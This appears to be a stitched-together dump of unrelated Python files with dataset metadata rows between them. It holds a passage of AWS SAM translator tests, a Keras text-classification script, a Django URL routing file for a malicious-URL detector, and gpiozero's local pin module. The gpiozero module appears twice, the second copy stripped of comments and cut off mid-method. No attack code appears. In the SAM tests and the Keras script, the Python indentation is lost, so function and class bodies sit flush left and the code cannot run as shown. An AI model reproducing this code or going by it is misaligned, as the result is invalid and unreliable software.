@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_logical_id_without_resolving_reference(self):
# Now value of `CodeKeyParam` is not present in document
first_transformed_template = self._do_transform(self.document)
second_transformed_template = self._do_transform(self.document)
first_version_id, _ = get_resource_by_type(first_transformed_template, "AWS::Lambda::Version")
second_version_id, _ = get_resource_by_type(second_transformed_template, "AWS::Lambda::Version")
assert first_version_id == second_version_id
def _do_transform(self, document, parameter_values=get_template_parameter_values()):
mock_policy_loader = get_policy_mock()
output_fragment = transform(document, parameter_values, mock_policy_loader)
print(json.dumps(output_fragment, indent=2))
return output_fragment
class TestParameterValuesHandling(TestCase):
def test_add_default_parameter_values_must_merge(self):
parameter_values = {
"Param1": "value1"
}
sam_template = {
"Parameters": {
"Param2": {
"Type": "String",
"Default": "template default"
}
}
}
expected = {
"Param1": "value1",
"Param2": "template default"
}
sam_parser = Parser()
translator = Translator({}, sam_parser)
result = translator._add_default_parameter_values(sam_template,
parameter_values)
self.assertEqual(expected, result)
def test_add_default_parameter_values_must_override_user_specified_values(self):
parameter_values = {
"Param1": "value1"
}
sam_template = {
"Parameters": {
"Param1": {
"Type": "String",
"Default": "template default"
}
}
}
expected = {
"Param1": "value1"
}
sam_parser = Parser()
translator = Translator({}, sam_parser)
result = translator._add_default_parameter_values(sam_template, parameter_values)
self.assertEqual(expected, result)
def test_add_default_parameter_values_must_skip_params_without_defaults(self):
parameter_values = {
"Param1": "value1"
}
sam_template = {
"Parameters": {
"Param1": {
"Type": "String"
},
"Param2": {
"Type": "String"
}
}
}
expected = {
"Param1": "value1"
}
sam_parser = Parser()
translator = Translator({}, sam_parser)
result = translator._add_default_parameter_values(sam_template, parameter_values)
self.assertEqual(expected, result)
@parameterized.expand([
# Array
param(["1", "2"]),
# String
param("something"),
# Some other non-parameter looking dictionary
param({"Param1": {"Foo": "Bar"}}),
param(None)
])
def test_add_default_parameter_values_must_ignore_invalid_template_parameters(self, template_parameters):
parameter_values = {
"Param1": "value1"
}
expected = {
"Param1": "value1"
}
sam_template = {
"Parameters": template_parameters
}
sam_parser = Parser()
translator = Translator({}, sam_parser)
result = translator._add_default_parameter_values(
sam_template, parameter_values)
self.assertEqual(expected, result)
class TestTemplateValidation(TestCase):
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_throws_when_resource_not_found(self):
template = {
"foo": "bar"
}
with self.assertRaises(InvalidDocumentException):
sam_parser = Parser()
translator = Translator({}, sam_parser)
translator.translate(template, {})
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_throws_when_resource_is_empty(self):
template = {
"Resources": {}
}
with self.assertRaises(InvalidDocumentException):
sam_parser = Parser()
translator = Translator({}, sam_parser)
translator.translate(template, {})
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_throws_when_resource_is_not_dict(self):
template = {
"Resources": [1,2,3]
}
with self.assertRaises(InvalidDocumentException):
sam_parser = Parser()
translator = Translator({}, sam_parser)
translator.translate(template, {})
class TestPluginsUsage(TestCase):
# Tests if plugins are properly injected into the translator
@patch("samtranslator.translator.translator.make_policy_template_for_function_plugin")
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_prepare_plugins_must_add_required_plugins(self, make_policy_template_for_function_plugin_mock):
# This is currently the only required plugin
plugin_instance = BasePlugin("something")
make_policy_template_for_function_plugin_mock.return_value = plugin_instance
sam_plugins = prepare_plugins([])
self.assertEqual(5, len(sam_plugins))
@patch("samtranslator.translator.translator.make_policy_template_for_function_plugin")
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_prepare_plugins_must_merge_input_plugins(self, make_policy_template_for_function_plugin_mock):
required_plugin = BasePlugin("something")
make_policy_template_for_function_plugin_mock.return_value = required_plugin
custom_plugin = BasePlugin("someplugin")
sam_plugins = prepare_plugins([custom_plugin])
self.assertEqual(6, len(sam_plugins))
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_prepare_plugins_must_handle_empty_input(self):
sam_plugins = prepare_plugins(None)
self.assertEqual(5, len(sam_plugins))
@patch("samtranslator.translator.translator.PolicyTemplatesProcessor")
@patch("samtranslator.translator.translator.PolicyTemplatesForFunctionPlugin")
def test_make_policy_template_for_function_plugin_must_work(self,
policy_templates_for_function_plugin_mock,
policy_templates_processor_mock):
default_templates = {"some": "value"}
policy_templates_processor_mock.get_default_policy_templates_json.return_value = default_templates
# mock to return instance of the processor
processor_instance = Mock()
policy_templates_processor_mock.return_value = processor_instance
# mock for plugin instance
plugin_instance = Mock()
policy_templates_for_function_plugin_mock.return_value = plugin_instance
result = make_policy_template_for_function_plugin()
self.assertEqual(plugin_instance, result)
policy_templates_processor_mock.get_default_policy_templates_json.assert_called_once_with()
policy_templates_processor_mock.assert_called_once_with(default_templates)
policy_templates_for_function_plugin_mock.assert_called_once_with(processor_instance)
@patch.object(Resource, "from_dict")
@patch("samtranslator.translator.translator.SamPlugins")
@patch("samtranslator.translator.translator.prepare_plugins")
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
def test_transform_method_must_inject_plugins_when_creating_resources(self,
prepare_plugins_mock,
sam_plugins_class_mock,
resource_from_dict_mock):
manifest = {
'Resources': {
'MyTable': {
'Type': 'AWS::Serverless::SimpleTable',
'Properties': {
}
}
}
}
sam_plugins_object_mock = Mock()
sam_plugins_class_mock.return_value = sam_plugins_object_mock
prepare_plugins_mock.return_value = sam_plugins_object_mock
resource_from_dict_mock.return_value = SamSimpleTable("MyFunction")
initial_plugins = [1,2,3]
sam_parser = Parser()
translator = Translator({}, sam_parser, plugins=initial_plugins)
translator.translate(manifest, {})
resource_from_dict_mock.assert_called_with("MyTable",
manifest["Resources"]["MyTable"],
sam_plugins=sam_plugins_object_mock)
prepare_plugins_mock.assert_called_once_with(initial_plugins)
def get_policy_mock():
mock_policy_loader = MagicMock()
mock_policy_loader.load.return_value = {
'AmazonDynamoDBFullAccess': 'arn:aws:iam::aws:policy/AmazonDynamoDBFullAccess',
'AmazonDynamoDBReadOnlyAccess': 'arn:aws:iam::aws:policy/AmazonDynamoDBReadOnlyAccess',
'AWSLambdaRole': 'arn:aws:iam::aws:policy/service-role/AWSLambdaRole',
}
return mock_policy_loader
def get_deployment_key(fragment):
logical_id, value = get_resource_by_type(fragment, "AWS::ApiGateway::Deployment")
return logical_id
def get_resource_by_type(template, resource_type):
    resources = template["Resources"]
    for key in resources:
        value = resources[key]
        if value.get("Type") == resource_type:
            return key, value
def get_exception_error_message(e):
return reduce(lambda message, error: message + ' ' + error.message, e.value.causes, e.value.message)
| true
| true
|
1c40c0d4965fe7922c46178338e7efc5b2a3a77c
| 7,754
|
py
|
Python
|
class_nn/embeddings_google.py
|
jmhernan/NIreland_NLP
|
c360c4978452e80575db2e0eed9ef540ed83b5c6
|
[
"MIT"
] | null | null | null |
class_nn/embeddings_google.py
|
jmhernan/NIreland_NLP
|
c360c4978452e80575db2e0eed9ef540ed83b5c6
|
[
"MIT"
] | null | null | null |
class_nn/embeddings_google.py
|
jmhernan/NIreland_NLP
|
c360c4978452e80575db2e0eed9ef540ed83b5c6
|
[
"MIT"
] | null | null | null |
######################################################
### Builds NN using google embeddings, parameters ###
### Uses: justifications_clean_text_ohe.csv ###
###### Collapses justifications to 6 categories. ###
###### Stems and tokenizes words ###
### Next step: Sarah needs to talk this through ###
### with Jose. What is the difference between ###
### this NN and the one built by ###
### "baseline_neural_network.py"? ###
######################################################
import numpy as np
import pandas as pd
import nltk
from keras.utils.np_utils import to_categorical
from keras.preprocessing.text import Tokenizer
from keras import models
from keras import layers
from keras.models import Sequential
from keras.layers import Dense
from keras.wrappers.scikit_learn import KerasClassifier
from keras.utils import np_utils
from keras import utils
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import KFold
from sklearn.preprocessing import LabelEncoder
from sklearn.pipeline import Pipeline
import os
from nltk.stem import PorterStemmer
from sklearn.model_selection import train_test_split
from gensim.models import KeyedVectors
## Set the file pathway and download corpus
this_file_path = os.path.abspath(__file__)
folder_root = os.path.split(this_file_path)[0]
repo_root = os.path.split(folder_root)[0]
repo_path = os.path.join(repo_root)
PATH_TO_GV = os.path.join(folder_root, 'wordvec') + '/'
df = pd.read_csv(os.path.join(repo_path, 'justifications_clean_text_ohe.csv'))
# Collapse justification categories from 12 to 6 -- approach #2
df['just_category_6'] = df['justification_cat']
df['just_category_6'] = df['just_category_6'].replace(['J_Emergency-Policy', 'J_Intelligence', 'J_Last-resort', 'J_Utilitarian-Deterrence', 'J_Law-and-order'], 'J_Security')
df['just_category_6'] = df['just_category_6'].replace(['J_Legal_Procedure'], 'J_Legal')
df['just_category_6'] = df['just_category_6'].replace(['J_Political-Strategic'], 'J_Political')
df['just_category_6'] = df['just_category_6'].replace(['J_Denial', 'J_Intl-Domestic_Precedent'], 'J_DenyHRVio')
df['just_category_6'] = df['just_category_6'].replace(['J_Development-Unity'], 'J_Misc')
df['just_categories'] = df['just_category_6']
# Create a unique number id for each justification category
col = ['just_categories', 'clean_text']
df = df[col]
df = df[pd.notnull(df['clean_text'])]
df.columns = ['just_categories', 'clean_text']
df['category_id'] = df['just_categories'].factorize()[0]
category_id_df = df[['just_categories', 'category_id']].drop_duplicates().sort_values('category_id')
category_to_id = dict(category_id_df.values)
id_to_category = dict(category_id_df[['category_id', 'just_categories']].values)
df.head()
######################################
### Stem sentences outside of grid ###
######################################
ps = PorterStemmer()
def stem_sentences(sentence):
tokens = sentence.split()
stemmed_tokens = [ps.stem(token) for token in tokens]
return ' '.join(stemmed_tokens)
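# Example (illustrative): the Porter stemmer maps inflected forms to a common
# stem, e.g. stem_sentences("running runs") -> "run run"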
df['stem_text'] = df['clean_text'].apply(stem_sentences)
#############################################
### Divide into training and testing data ###
#############################################
#sentences = df['stem_text'].values # include stopwords, stemmed
sentences = df['clean_text'] # include stopwords, unstemmed
y = df['just_categories']
tokenizer = Tokenizer()
tokenizer.fit_on_texts(sentences)
sequences = tokenizer.texts_to_sequences(sentences)
word_index = tokenizer.word_index # words mapped to token ids, ordered from most to least frequent
print('Found %s unique tokens.' % len(word_index))
max_words = 5153 # total words of vocabulary we will consider
num_words = [len(words.split()) for words in sentences]
max_seq_len = max(num_words) + 1
from keras.preprocessing.sequence import pad_sequences
text_tok = pad_sequences(sequences, maxlen=max_seq_len+1)
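# pad_sequences left-pads with zeros by default (padding='pre'), e.g.
# pad_sequences([[5, 7]], maxlen=4) -> array([[0, 0, 5, 7]])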
text_tok.shape
np.mean(text_tok > 0)
from keras.utils import to_categorical
encoder = LabelEncoder()
encoder.fit(y)
labels = encoder.transform(y)
num_classes = np.max(labels) + 1
labels = utils.to_categorical(labels, num_classes)
print('Shape of data tensor:', text_tok.shape)
print('Shape of label tensor:', labels.shape)
# split training data into test, validation
x_train, x_test, y_train, y_test = train_test_split(text_tok, labels, test_size=0.2, random_state = 42)
# Prepare embedding matrix
word_vector_dim=100
vocabulary_size= max_words+1
embedding_matrix = np.zeros((vocabulary_size, word_vector_dim))
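# Note: this zero matrix is only used for its shape here; the first model's
# Embedding layer below is trained from scratch (no weights= argument is passed).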
nb_filters = 64
filter_size_a = 2
drop_rate = 0.5
my_optimizer = 'adam'
from keras.layers import Input, Embedding, Dropout, Conv1D, GlobalMaxPooling1D, Dense, Concatenate, MaxPooling1D, Flatten
from keras.models import Model, load_model
from keras.layers import SpatialDropout1D
my_input = Input(shape=(None,))
embedding = Embedding(input_dim=embedding_matrix.shape[0], input_length=max_seq_len,
output_dim=word_vector_dim, trainable=True,)(my_input)
x = Conv1D(filters = nb_filters, kernel_size = filter_size_a,
activation = 'relu',)(embedding)
x = SpatialDropout1D(drop_rate)(x)
x = MaxPooling1D(pool_size=5)(x)
x = Flatten()(x)
x = Dense(128, activation='relu')(x)
prob = Dense(6, activation = 'softmax',)(x)
model = Model(my_input, prob)
model.compile(loss='categorical_crossentropy', optimizer = my_optimizer,
metrics = ['accuracy'])
model.fit(x_train, y_train,                # features and target vector
          epochs=20,                       # number of passes over the data
          verbose=1,                       # print progress per epoch
          batch_size=100,                  # number of observations per batch
          validation_data=(x_test, y_test))
# add the google embeddings
# Prepare embedding matrix
word_vectors = KeyedVectors.load_word2vec_format(PATH_TO_GV + 'GoogleNews-vectors-negative300.bin', binary=True)
word_vector_dim=300
vocabulary_size= max_words + 1
embedding_matrix = np.zeros((vocabulary_size, word_vector_dim))
for word, i in word_index.items():
if i>=max_words:
continue
try:
embedding_vector = word_vectors[word]
embedding_matrix[i] = embedding_vector
except KeyError:
embedding_matrix[i]=np.random.normal(0,np.sqrt(0.25),word_vector_dim)
len(embedding_matrix)
embedding_matrix.shape
type(embedding_matrix)
nonzero_elements = np.count_nonzero(np.count_nonzero(embedding_matrix, axis=1))
nonzero_elements / max_words
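# Fraction of embedding rows initialized above (either a pretrained Google News
# vector or the random fallback); row 0 stays all-zero for the padding token.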
# Setting parameters for the NN
nb_filters = 128
filter_size_a = 3
drop_rate = 0.5
my_optimizer = 'adam'
from keras.layers import Input, Embedding, Dropout, Conv1D, GlobalMaxPooling1D, Dense, Concatenate, MaxPooling1D, Flatten
from keras.models import Model, load_model
## Build the neural network
my_input = Input(shape=(max_seq_len+1,))
embedding = Embedding(input_dim=embedding_matrix.shape[0], # vocab size, including the 0-th word used for padding
output_dim=word_vector_dim,
weights=[embedding_matrix], # we pass our pre-trained embeddings
input_length=max_seq_len+1,
trainable=True
)(my_input)
# Kernel size is how big your window is. Putting x number of words into the NN together at a time from each sentence.
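# Illustrative: with kernel_size=3 and the default 'valid' padding, a 100-token
# input yields 100 - 3 + 1 = 98 window positions, each producing nb_filters values.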
x = Conv1D(filters = nb_filters, kernel_size = filter_size_a,
activation = 'relu',)(embedding)
x = MaxPooling1D(pool_size=5)(x)
x = Flatten()(x)
x = Dense(128, activation='relu')(x)
prob = Dense(6, activation = 'softmax',)(x)
model = Model(my_input, prob)
model.compile(loss='categorical_crossentropy', optimizer = my_optimizer,
metrics = ['accuracy'])
x = model.fit(x_train, y_train,            # features and target vector
              epochs=20,                   # number of passes over the data
              verbose=1,                   # print progress per epoch
              batch_size=100,              # number of observations per batch
              validation_data=(x_test, y_test))
| 34.7713
| 173
| 0.716404
| true
| true
|
|
1c40c13ce9a777a4ab812a86483389edbb71d4ec
| 867
|
py
|
Python
|
myapp/urls.py
|
srikar7777/Malicious-Urlv5
|
a3a231d60cb6ffc44fdc297bf73683872decd435
|
[
"MIT"
] | 33
|
2020-02-16T08:08:36.000Z
|
2022-03-31T01:01:45.000Z
|
myapp/urls.py
|
Kabeer-Ahmed11/Malicious-Urlv5
|
617b319bfd9a7ed6320abd9e7b90c518064b66cb
|
[
"MIT"
] | 6
|
2020-02-12T06:24:55.000Z
|
2022-02-10T08:21:55.000Z
|
myapp/urls.py
|
Kabeer-Ahmed11/Malicious-Urlv5
|
617b319bfd9a7ed6320abd9e7b90c518064b66cb
|
[
"MIT"
] | 22
|
2020-04-11T07:19:46.000Z
|
2022-03-02T16:59:53.000Z
|
from django.urls import path
from . import views
urlpatterns = [
path('',views.index,name='index'),
path('getuserfeedbackform',views.getuserfeedbackform,name="getuserfeedbackform"),
path('saveuserfeedbackform',views.saveuserfeedbackform,name="saveuserfeedbackform"),
path('api',views.api,name='api'),
path('search',views.search,name="search"),
path('result',views.result,name='result'),
path('about',views.about,name='about'),
path('geturlhistory',views.geturlhistory,name="geturlhistory"),
path('discuss',views.discuss,name="discuss"),
path('reply/<int:replyid>',views.replyform,name="reply"),
    path('savereply',views.savereply,name="savereply"),
path('searchdiscuss',views.searchdiscuss,name="searchdiscuss"),
path('getdataset',views.getdataset,name='getdataset'),
path('getdocs',views.getdoc,name='namedoc')
]
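# Illustrative usage (assumes this URLconf is included at the project root):
#   reverse('reply', args=[42]) -> '/reply/42'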
| 39.409091
| 88
| 0.71511
|
from django.urls import path
from . import views
urlpatterns = [
path('',views.index,name='index'),
path('getuserfeedbackform',views.getuserfeedbackform,name="getuserfeedbackform"),
path('saveuserfeedbackform',views.saveuserfeedbackform,name="saveuserfeedbackform"),
path('api',views.api,name='api'),
path('search',views.search,name="search"),
path('result',views.result,name='result'),
path('about',views.about,name='about'),
path('geturlhistory',views.geturlhistory,name="geturlhistory"),
path('discuss',views.discuss,name="discuss"),
path('reply/<int:replyid>',views.replyform,name="reply"),
    path('savereply',views.savereply,name="savereply"),
path('searchdiscuss',views.searchdiscuss,name="searchdiscuss"),
path('getdataset',views.getdataset,name='getdataset'),
path('getdocs',views.getdoc,name='namedoc')
]
| true
| true
|
1c40c470aff28eeaa8d9b1f7fa0b8a20f0302121
| 10,796
|
py
|
Python
|
gpiozero/pins/local.py
|
NotBobTheBuilder/gpiozero
|
aeb9d30056ec97e6bf896152e71a870bd0099b4e
|
[
"BSD-3-Clause"
] | 1
|
2021-01-27T21:46:52.000Z
|
2021-01-27T21:46:52.000Z
|
gpiozero/pins/local.py
|
NotBobTheBuilder/gpiozero
|
aeb9d30056ec97e6bf896152e71a870bd0099b4e
|
[
"BSD-3-Clause"
] | null | null | null |
gpiozero/pins/local.py
|
NotBobTheBuilder/gpiozero
|
aeb9d30056ec97e6bf896152e71a870bd0099b4e
|
[
"BSD-3-Clause"
] | null | null | null |
# GPIO Zero: a library for controlling the Raspberry Pi's GPIO pins
# Copyright (c) 2016-2019 Dave Jones <dave@waveform.org.uk>
# Copyright (c) 2019 Andrew Scheller <github@loowis.durge.org>
# Copyright (c) 2018 Martchus <martchus@gmx.net>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
absolute_import,
print_function,
division,
)
nstr = str
str = type('')
import io
import errno
import struct
import warnings
from collections import defaultdict
from threading import Lock
try:
from time import monotonic
except ImportError:
from time import time as monotonic
try:
from spidev import SpiDev
except ImportError:
SpiDev = None
from . import SPI
from .pi import PiFactory, PiPin, SPI_HARDWARE_PINS
from .spi import SPISoftwareBus
from ..devices import Device, SharedMixin
from ..output_devices import OutputDevice
from ..exc import DeviceClosed, PinUnknownPi, SPIInvalidClockMode
class LocalPiFactory(PiFactory):
"""
Extends :class:`~gpiozero.pins.pi.PiFactory`. Abstract base class
representing pins attached locally to a Pi. This forms the base class for
local-only pin interfaces (:class:`~gpiozero.pins.rpigpio.RPiGPIOPin`,
:class:`~gpiozero.pins.rpio.RPIOPin`, and
:class:`~gpiozero.pins.native.NativePin`).
"""
pins = {}
_reservations = defaultdict(list)
_res_lock = Lock()
def __init__(self):
super(LocalPiFactory, self).__init__()
self.spi_classes = {
('hardware', 'exclusive'): LocalPiHardwareSPI,
('hardware', 'shared'): LocalPiHardwareSPIShared,
('software', 'exclusive'): LocalPiSoftwareSPI,
('software', 'shared'): LocalPiSoftwareSPIShared,
}
# Override the reservations and pins dict to be this class' attributes.
# This is a bit of a dirty hack, but ensures that anyone evil enough to
# mix pin implementations doesn't try and control the same pin with
# different backends
self.pins = LocalPiFactory.pins
self._reservations = LocalPiFactory._reservations
self._res_lock = LocalPiFactory._res_lock
def _get_revision(self):
revision = None
try:
with io.open('/proc/device-tree/system/linux,revision', 'rb') as f:
revision = hex(struct.unpack(nstr('>L'), f.read(4))[0])[2:]
except IOError as e:
if e.errno != errno.ENOENT:
raise e
with io.open('/proc/cpuinfo', 'r') as f:
for line in f:
if line.startswith('Revision'):
revision = line.split(':')[1].strip().lower()
if revision is not None:
overvolted = revision.startswith('100')
if overvolted:
revision = revision[-4:]
return int(revision, base=16)
raise PinUnknownPi('unable to locate Pi revision in /proc/device-tree or /proc/cpuinfo')
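    # Illustrative /proc/cpuinfo line that the parser above matches:
    #   Revision        : a02082
    # A leading '100' (the overvolt/warranty bit on older boards) is stripped
    # before the hex code is converted with int(revision, base=16).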
@staticmethod
def ticks():
return monotonic()
@staticmethod
def ticks_diff(later, earlier):
# NOTE: technically the guarantee to always return a positive result
# cannot be maintained in versions where monotonic() is not available
# and we fall back to time(). However, in that situation we've no
# access to a true monotonic source, and no idea how far the clock has
# skipped back so this is the best we can do anyway.
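        # e.g. ticks_diff(12.5, 12.0) -> 0.5; any negative skew clamps to 0.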
return max(0, later - earlier)
class LocalPiPin(PiPin):
"""
Extends :class:`~gpiozero.pins.pi.PiPin`. Abstract base class representing
a multi-function GPIO pin attached to the local Raspberry Pi.
"""
def _call_when_changed(self, ticks=None, state=None):
"""
Overridden to provide default ticks from the local Pi factory.
.. warning::
The local pin factory uses a seconds-based monotonic value for
its ticks but you *must not* rely upon this behaviour. Ticks are
an opaque value that should only be compared with the associated
:meth:`Factory.ticks_diff` method.
"""
super(LocalPiPin, self)._call_when_changed(
self._factory.ticks() if ticks is None else ticks,
self.state if state is None else state)
class LocalPiHardwareSPI(SPI, Device):
def __init__(self, factory, port, device):
self._port = port
self._device = device
self._interface = None
if SpiDev is None:
raise ImportError('failed to import spidev')
super(LocalPiHardwareSPI, self).__init__()
pins = SPI_HARDWARE_PINS[port]
self.pin_factory.reserve_pins(
self,
pins['clock'],
pins['mosi'],
pins['miso'],
pins['select'][device]
)
self._interface = SpiDev()
self._interface.open(port, device)
self._interface.max_speed_hz = 500000
def close(self):
if self._interface is not None:
self._interface.close()
self._interface = None
self.pin_factory.release_all(self)
super(LocalPiHardwareSPI, self).close()
@property
def closed(self):
return self._interface is None
def __repr__(self):
try:
self._check_open()
return 'SPI(port=%d, device=%d)' % (self._port, self._device)
except DeviceClosed:
return 'SPI(closed)'
def transfer(self, data):
"""
Writes data (a list of integer words where each word is assumed to have
:attr:`bits_per_word` bits or less) to the SPI interface, and reads an
equivalent number of words, returning them as a list of integers.
"""
return self._interface.xfer2(data)
def _get_clock_mode(self):
return self._interface.mode
def _set_clock_mode(self, value):
self._interface.mode = value
def _get_lsb_first(self):
return self._interface.lsbfirst
def _set_lsb_first(self, value):
self._interface.lsbfirst = bool(value)
def _get_select_high(self):
return self._interface.cshigh
def _set_select_high(self, value):
self._interface.cshigh = bool(value)
def _get_bits_per_word(self):
return self._interface.bits_per_word
def _set_bits_per_word(self, value):
self._interface.bits_per_word = value
class LocalPiSoftwareSPI(SPI, OutputDevice):
def __init__(self, factory, clock_pin, mosi_pin, miso_pin, select_pin):
self._bus = None
super(LocalPiSoftwareSPI, self).__init__(select_pin, active_high=False)
try:
self._clock_phase = False
self._lsb_first = False
self._bits_per_word = 8
self._bus = SPISoftwareBus(clock_pin, mosi_pin, miso_pin)
except:
self.close()
raise
def _conflicts_with(self, other):
# XXX Need to refine this
return not (
isinstance(other, LocalPiSoftwareSPI) and
(self.pin.number != other.pin.number)
)
def close(self):
if self._bus is not None:
self._bus.close()
self._bus = None
super(LocalPiSoftwareSPI, self).close()
@property
def closed(self):
return self._bus is None
def __repr__(self):
try:
self._check_open()
return 'SPI(clock_pin=%d, mosi_pin=%d, miso_pin=%d, select_pin=%d)' % (
self._bus.clock.pin.number,
self._bus.mosi.pin.number,
self._bus.miso.pin.number,
self.pin.number)
except DeviceClosed:
return 'SPI(closed)'
def transfer(self, data):
with self._bus.lock:
self.on()
try:
return self._bus.transfer(
data, self._clock_phase, self._lsb_first, self._bits_per_word)
finally:
self.off()
def _get_clock_mode(self):
with self._bus.lock:
return (not self._bus.clock.active_high) << 1 | self._clock_phase
def _set_clock_mode(self, value):
if not (0 <= value < 4):
raise SPIInvalidClockMode("%d is not a valid clock mode" % value)
with self._bus.lock:
self._bus.clock.active_high = not (value & 2)
self._clock_phase = bool(value & 1)
def _get_lsb_first(self):
return self._lsb_first
def _set_lsb_first(self, value):
self._lsb_first = bool(value)
def _get_bits_per_word(self):
return self._bits_per_word
def _set_bits_per_word(self, value):
if value < 1:
raise ValueError('bits_per_word must be positive')
self._bits_per_word = int(value)
def _get_select_high(self):
return self.active_high
def _set_select_high(self, value):
with self._bus.lock:
self.active_high = value
self.off()
class LocalPiHardwareSPIShared(SharedMixin, LocalPiHardwareSPI):
@classmethod
def _shared_key(cls, factory, port, device):
return (port, device)
class LocalPiSoftwareSPIShared(SharedMixin, LocalPiSoftwareSPI):
@classmethod
def _shared_key(cls, factory, clock_pin, mosi_pin, miso_pin, select_pin):
return (select_pin,)
| 34.602564
| 96
| 0.648388
|
# Copyright (c) 2016-2019 Dave Jones <dave@waveform.org.uk>
# Copyright (c) 2019 Andrew Scheller <github@loowis.durge.org>
# Copyright (c) 2018 Martchus <martchus@gmx.net>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
absolute_import,
print_function,
division,
)
nstr = str
str = type('')
import io
import errno
import struct
import warnings
from collections import defaultdict
from threading import Lock
try:
from time import monotonic
except ImportError:
from time import time as monotonic
try:
from spidev import SpiDev
except ImportError:
SpiDev = None
from . import SPI
from .pi import PiFactory, PiPin, SPI_HARDWARE_PINS
from .spi import SPISoftwareBus
from ..devices import Device, SharedMixin
from ..output_devices import OutputDevice
from ..exc import DeviceClosed, PinUnknownPi, SPIInvalidClockMode
class LocalPiFactory(PiFactory):
pins = {}
_reservations = defaultdict(list)
_res_lock = Lock()
def __init__(self):
super(LocalPiFactory, self).__init__()
self.spi_classes = {
('hardware', 'exclusive'): LocalPiHardwareSPI,
('hardware', 'shared'): LocalPiHardwareSPIShared,
('software', 'exclusive'): LocalPiSoftwareSPI,
('software', 'shared'): LocalPiSoftwareSPIShared,
}
# Override the reservations and pins dict to be this class' attributes.
# different backends
self.pins = LocalPiFactory.pins
self._reservations = LocalPiFactory._reservations
self._res_lock = LocalPiFactory._res_lock
def _get_revision(self):
revision = None
try:
with io.open('/proc/device-tree/system/linux,revision', 'rb') as f:
revision = hex(struct.unpack(nstr('>L'), f.read(4))[0])[2:]
except IOError as e:
if e.errno != errno.ENOENT:
raise e
with io.open('/proc/cpuinfo', 'r') as f:
for line in f:
if line.startswith('Revision'):
revision = line.split(':')[1].strip().lower()
if revision is not None:
overvolted = revision.startswith('100')
if overvolted:
revision = revision[-4:]
return int(revision, base=16)
raise PinUnknownPi('unable to locate Pi revision in /proc/device-tree or /proc/cpuinfo')
@staticmethod
def ticks():
return monotonic()
@staticmethod
def ticks_diff(later, earlier):
# NOTE: technically the guarantee to always return a positive result
# cannot be maintained in versions where monotonic() is not available
# and we fall back to time(). However, in that situation we've no
return max(0, later - earlier)
class LocalPiPin(PiPin):
def _call_when_changed(self, ticks=None, state=None):
super(LocalPiPin, self)._call_when_changed(
self._factory.ticks() if ticks is None else ticks,
self.state if state is None else state)
class LocalPiHardwareSPI(SPI, Device):
def __init__(self, factory, port, device):
self._port = port
self._device = device
self._interface = None
if SpiDev is None:
raise ImportError('failed to import spidev')
super(LocalPiHardwareSPI, self).__init__()
pins = SPI_HARDWARE_PINS[port]
self.pin_factory.reserve_pins(
self,
pins['clock'],
pins['mosi'],
pins['miso'],
pins['select'][device]
)
self._interface = SpiDev()
self._interface.open(port, device)
self._interface.max_speed_hz = 500000
def close(self):
if self._interface is not None:
self._interface.close()
self._interface = None
self.pin_factory.release_all(self)
